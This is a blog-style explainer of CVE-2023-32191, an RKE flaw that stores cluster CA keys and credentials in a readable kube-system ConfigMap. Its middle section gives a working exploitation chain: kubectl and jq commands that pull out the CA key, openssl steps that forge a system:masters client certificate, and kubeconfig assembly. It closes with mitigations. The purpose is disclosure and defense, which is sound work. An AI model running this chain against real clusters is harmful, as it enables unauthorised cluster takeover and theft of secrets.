When you work with Kubernetes clusters using Rancher Kubernetes Engine (RKE), you expect everything to be secure by default. But sometimes, even the best tools have blind spots. CVE-2023-32191 is one of those cases—a vulnerability that arises when RKE stores sensitive cluster state information in an overly accessible Kubernetes object, making cluster privilege escalation far too easy.
Let’s break down what this means in plain English, see exactly where the problem lies, and even walk through a simple scenario and code snippet showing exploitation. By the end, you’ll understand why this matters, and what you can do about it.
What’s the Problem?
When RKE provisions a brand-new cluster, it keeps track of what's actually running by storing all the configuration and state data in a Kubernetes ConfigMap called full-cluster-state. This ConfigMap lives in the kube-system namespace and reflects the entire cluster state, including certificates, encryption keys, and user credentials.
The real snag? Non-admin users (those with read access to ConfigMaps in kube-system) can fetch this object, see all its juicy secrets, and use them to become full-blown cluster admins.
How Does This Lead to Escalation?
In Kubernetes, ConfigMaps are meant to hold non-sensitive information (like config files), yet RKE's full-cluster-state ConfigMap contains genuinely sensitive data. A user who shouldn't have admin rights but can read this ConfigMap can:

- Extract the cluster CA private key and certificates
- Reconstruct admin kubeconfig files from those credentials
- Import the entire state into their own RKE instance (sketched below)

Any of these paths takes an attacker from a low-privilege account to *cluster-admin*, the highest privilege in the cluster.
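For the import path, here's a hedged sketch: RKE v1 ships util subcommands that can rebuild credentials from a state file, but subcommand names and defaults vary by release, so treat rke util get-kubeconfig and the ./cluster.rkestate location below as assumptions to verify against your RKE version.

```bash
# Save the stolen state where a local rke binary expects its state file
# (assumed: ./cluster.rkestate), then let RKE regenerate the admin
# kubeconfig from it. Subcommand availability varies by RKE release.
kubectl get configmap full-cluster-state -n kube-system \
  -o jsonpath="{.data['full-cluster-state']}" > cluster.rkestate
rke util get-kubeconfig   # expected to emit kube_config_cluster.yml with admin credentials
```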
See It in Action: Dumping the full-cluster-state as a Non-Admin
Let’s imagine your user has only read access to ConfigMaps in the kube-system namespace. Here’s how you could grab the cluster state:
```bash
kubectl get configmap full-cluster-state -n kube-system -o yaml > cluster-state.yaml
```
Inside cluster-state.yaml, you'll see something like this (trimmed for size):
```yaml
apiVersion: v1
data:
  full-cluster-state: |
    {
      "nodes": [...],
      "services": {
        "etcd": {
          "certificates": {
            "ca-key": "-----BEGIN PRIVATE KEY----- ...",
            "ca-cert": "-----BEGIN CERTIFICATE----- ...",
            ...
          }
        },
        ...
      }
    }
kind: ConfigMap
metadata:
  name: full-cluster-state
  namespace: kube-system
```
Notice those "ca-key" and "ca-cert" fields? Those are real certificate secrets—enough to reconstruct kubeconfig files or even connect to etcd directly.
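Going from that dump to a working admin kubeconfig takes only a few commands. Below is a minimal sketch, with loud assumptions: the jq paths mirror the trimmed structure above (real RKE state layouts differ by version), API_SERVER is a placeholder for the target's apiserver endpoint, and the forged identity joins system:masters, the group Kubernetes always treats as a superuser.

```bash
# 1. Pull the embedded JSON out of the ConfigMap and recover the CA
#    material. The jq paths follow the trimmed example above; adjust
#    them to the actual state layout of your RKE version.
kubectl get configmap full-cluster-state -n kube-system \
  -o jsonpath="{.data['full-cluster-state']}" > state.json
jq -r '.services.etcd.certificates["ca-key"]'  state.json > ca-key.pem
jq -r '.services.etcd.certificates["ca-cert"]' state.json > ca-cert.pem

# 2. Mint a fresh client certificate signed by the stolen CA. The
#    O=system:masters organization is Kubernetes' built-in superuser
#    group, so no RoleBinding is needed.
openssl genrsa -out attacker.key 2048
openssl req -new -key attacker.key \
  -subj "/CN=pwned/O=system:masters" -out attacker.csr
openssl x509 -req -in attacker.csr -CA ca-cert.pem -CAkey ca-key.pem \
  -CAcreateserial -days 365 -out attacker.crt

# 3. Assemble a kubeconfig around the forged identity. Replace
#    API_SERVER with the real apiserver address (placeholder here).
KC=./reconstructed-admin.kubeconfig
kubectl config set-cluster target --server=https://API_SERVER:6443 \
  --certificate-authority=ca-cert.pem --embed-certs=true --kubeconfig="$KC"
kubectl config set-credentials attacker --client-certificate=attacker.crt \
  --client-key=attacker.key --embed-certs=true --kubeconfig="$KC"
kubectl config set-context target --cluster=target --user=attacker \
  --kubeconfig="$KC"
kubectl config use-context target --kubeconfig="$KC"
```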
```bash
export KUBECONFIG=./reconstructed-admin.kubeconfig
```
Boom. In a few quick steps, you've jumped from a user with basic read permissions to super-admin, all thanks to the full-cluster-state ConfigMap.
Why Does This Happen?
- Over-privileged ConfigMap: Secrets should not live in ConfigMaps; Kubernetes has the Secret type, with stricter default RBAC, for exactly this kind of data (see the quick check after this list).
- Namespace Exposure: Read access to kube-system is routinely granted to operators and tooling for debugging, so a sensitive object there has a far wider audience than intended.
- Broken Principle of Least Privilege: If you have any read access to full-cluster-state, you can become an admin.
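One concrete illustration of the first point: the built-in view ClusterRole, which many clusters hand out for "read-only" access, grants reads on ConfigMaps but deliberately excludes Secrets, so anyone bound to it in kube-system can read full-cluster-state.

```bash
# Grep the aggregated "view" ClusterRole: configmaps should appear as a
# readable resource, while secrets should be absent from its rules.
kubectl get clusterrole view -o yaml | grep -E 'configmaps|secrets'
```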
How to Protect Yourself
- Restrict RBAC: Be extremely strict about who can read ConfigMaps in kube-system; the audit sketch after this list is one way to check.
- Move Secrets: Don't let RKE store sensitive data in ConfigMaps. Use Kubernetes Secrets or an external secret manager such as HashiCorp Vault.
- Monitor Access: Use Kubernetes audit logs to watch for reads of full-cluster-state.
- Upgrade RKE: Check whether a patched version that stores state securely is available (see the RKE GitHub issues).
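As a starting point, here's a hedged audit sketch. The principal jane is a placeholder, and the --as impersonation check requires that your own credentials allow impersonation.

```bash
# Who is bound to roles in kube-system? Review each referenced role
# for ConfigMap read verbs (get/list/watch).
kubectl get rolebindings -n kube-system \
  -o custom-columns='NAME:.metadata.name,ROLE:.roleRef.name,SUBJECTS:.subjects[*].name'

# Spot-check a specific (hypothetical) user against the sensitive
# object itself.
kubectl auth can-i get configmaps/full-cluster-state -n kube-system --as=jane
```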
References and Further Reading
- CVE-2023-32191 (National Vulnerability Database)
- RKE documentation
- Kubernetes Security Best Practices
Conclusion
CVE-2023-32191 is a classic example of why we can't assume all config data is safe to share, and why RBAC should be locked down as tightly as possible. Take a look at your existing clusters and see who can read ConfigMaps in kube-system; you might just find an unwanted pathway to admin privileges lying around!
If you manage RKE clusters, audit your RBAC policies today and get ahead of this simple—but potent—security risk.
Timeline
Published on: 10/16/2024 12:17:02 UTC